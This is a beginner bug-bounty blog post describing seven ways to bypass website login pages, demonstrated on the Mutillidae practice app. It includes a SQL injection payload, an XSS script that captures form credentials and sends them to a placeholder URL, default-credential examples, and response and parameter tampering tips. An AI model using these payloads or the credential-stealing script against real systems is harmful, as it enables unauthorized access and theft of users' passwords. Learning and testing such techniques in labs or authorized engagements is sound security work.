Hello to all beginner bug hunting fellows. This is Rocky, today i came with an another blog on login page. This blog is about bypassing the login page functionality which happens due to the weaknesses of the site. There are many ways to bypass login page functionality but in this blog we are discussing about some common ways. So let’s start…..

We are talking about these seven ways —

  1. Bypass by SQL Injection
  2. By Cross Site Scripting(XSS)
  3. By Manipulating the Response
  4. Bypass by Brute Force Attack
  5. Bypass by Directory Fuzzing Attack
  6. Bypass by Default credentials
  7. By Removing Parameter in Request

Bypass by SQL Injection

I am taking an example of Mutillidae for demonstration.

So now we can put the SQL injection payload in it. For this syntax error the payload is “ ‘ or 1=1- -” now let’s see what happen when enter it.

Boooom!! we are logged in as an admin. In your case try other payloads when it not working and also use SQLMap tool for dump the usernames and passwords.

By Cross Site Scripting(XSS)

Enter the xss payload <script>alert(1)</script> and it shows the popup, so you can try CSRF via XSS and see the victims credentials. This is the CSRF payload for it —

<script>
function intercept() {

 var user = document.forms[0].elements[0].value;
 var pass = document.forms[0].elements[1].value;


 var xhr = new XMLHttpRequest();

 xhr.open("GET", "https://your-target-url?username/email="+user+"&password="+pass)
 xhr.send();
return false;
 }
 document.forms[0].onsubmit = intercept;

</script>

By Manipulating the Response

This method mainly based on Response Status code manipulation and Response Body manipulation. First of all make an account on your target then login with correct credentials and intercepts request in burp suite and analyze the response after that you try to login with wrong credentials and manipulate the response as you see it with your correct credentials like

403 Forbidden
<redacted>
{"error":true, "message":"Invalid Token"}
200 OK
<redacted>
{"success":true}

If this weakness is exist you will be logged in on site.

Bypass by Brute Force Attack

This attack mainly occur when site does not set the time limit and repeating limit, basically does not set time delay function on login page. When you enter repeatedly wrong credentials and site show the time like enter credentials after 5 minutes. When site show this kind of error so it difficult to do this method. I have written a blog about brute force attack, its link is given below see it how to do this attack.

Bypass by Directory Fuzzing Attack

In this method, we try to do directory brute forcing with the help some tools like ffuf, dirbuster and burp suite intruder etc. Most of the tools have its own directory wordlist but when its not have wordlist so in linux it have own wordlist you use them for windows you can search on google.

In this attack may be possible, tool can find any directory or subdirectory which show useful response or open any page which only open when you logged in site. I have used the FFUF tool in this blog you can see how it works.

Bypass by Default credentials

When the developer creates the site, he creates some default credentials for testing and many times it happens that he removes it or many times he does not remove it from the record. And when the site allows any password to be entered, many users can enter weak passwords and site accept it. So you should try the default credentials. Default credentials lists become easily available on Google. Default credentials like admin:admin, admin:password, username:pass12345 etc.

By Removing Parameter in Request

When you enter wrong credentials the site shows error like username and password is incorrect/does not match, password is incorrect for this username etc, this type of response is shown by the site so can try this method Huh. First you intercept the request and remove the password parameter in the request and forward the request. Then the server sees that the username is available and logs you in to the site. This problem occurs when the server does not analyze the request properly.

These are some ways hopefully you enjoy it and learn something new with this blog. So that’s it for today’s blog, see you in the next blog. Thank You For Reading.

Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *